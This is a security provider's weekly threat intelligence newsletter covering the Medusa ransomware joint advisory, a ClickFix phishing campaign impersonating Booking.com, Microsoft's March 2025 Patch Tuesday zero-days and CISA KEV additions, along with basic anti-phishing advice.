In this weekly Threat Intelligence Brief we look back at top stories and security related callouts to provide relevant and actionable insights for the
information security consumer.
We reference threat intelligence gained through our position as a security provider as well as industry sources in the development of this brief.
In this edition:
Medusa Ransomware Advisory
Social Engineering with ClickFix
Microsoft March 2025 Patch Tuesday
CISA KEV Updates
Medusa Ransomware Advisory
A joint advisory for Medusa ransomware was issued by the FBI, CISA and MS-ISAC to highlight historically observed TTPs and IOCs from the ransomware-as-a-service provider. The number of known impacted victims is currently over 300 and are from a variety of critical sectors including medical, education, legal, insurance, technology and manufacturing.
Medusa developers are known to recruit initial access brokers who focus primarily on phishing and exploitation of unpatched software vulnerabilities. The group leverages double extortion techniques, combining data encryption with the threat of leaking sensitive information to compel payment. Medusa ransomware incidents highlight the escalating trend of threat actors focusing on critical services, intensifying pressure on victims to pay ransoms in order to limit operational disruptions and accelerate recovery. CISA recommends the following actions to help mitigate threats related to Medusa ransomware activity:
Source: CISA
Social Engineering with ClickFix
Microsoft Threat Intelligence has identified an ongoing phishing campaign impersonating the online travel platform Booking.com, with a specific focus on entities within the hospitality sector. The attackers employ a social engineering method known as "ClickFix" to distribute multiple credential-harvesting malware strains, aiming to facilitate financial fraud and data theft.
The ClickFix technique exploits users' natural inclination to resolve problems by presenting deceptive error messages or prompts. These prompts instruct the user to copy, paste, and execute commands—ultimately leading to malware delivery. In this phishing campaign, victims are guided to open the Windows Run dialog using a keyboard shortcut, then unknowingly execute a malicious command that is automatically placed on their clipboard by the phishing site. Here is an example of a fake CAPTCHA using the ClickFix social engineering technique:
- Check the sender’s email address to ensure it’s legitimate
- Contact the service provider directly
- Be wary of urgent calls to action or threats
- Hover over links to observe the full URL
- Search for typos
Source: Microsoft Threat Intelligence
Microsoft March 2025 Patch Tuesday
57 total vulnerabilities fixed, including 6 rated as critical severity. Products affected include Microsoft Streaming Service, Windows Hyper-V, Microsoft Windows, DNS Server, Visual Studio, Windows Routing and Remote Access Service (RRAS), Windows NTLM, Windows Common Log File System Driver, and more.
7 actively exploited zero-day vulnerability patched, including:
CVE-2025-24983, CVE-2025-24984, CVE-2025-24985, CVE-2025-24991, CVE-2025-24993, CVE-2025-26630 and CVE-2025-26633
Official Microsoft release notes with links to all the individual CVEs can be found here: https://msrc.microsoft.com/update-guide/releaseNote/2025-Mar
Source: Microsoft
CISA KEV updates
CISA has added 13 new CVEs to their Known Exploited Vulnerability (KEV) catalog this week:
Don't know where to begin with vulnerability management?
Using CISAs KEV catalog as a risk-based approach can be a great way to help prioritize vulnerability remediation in your organization. This link provides guidance on how to implement the KEV CISA.
Source: Known Exploited Vulnerabilities Catalog | CISA
Coretek's managed SOC/SIEM customers benefit from the latest threat intelligence. If you're interested in learning more about what Coretek can offer your organization, please reach out: https://coretek.com/contact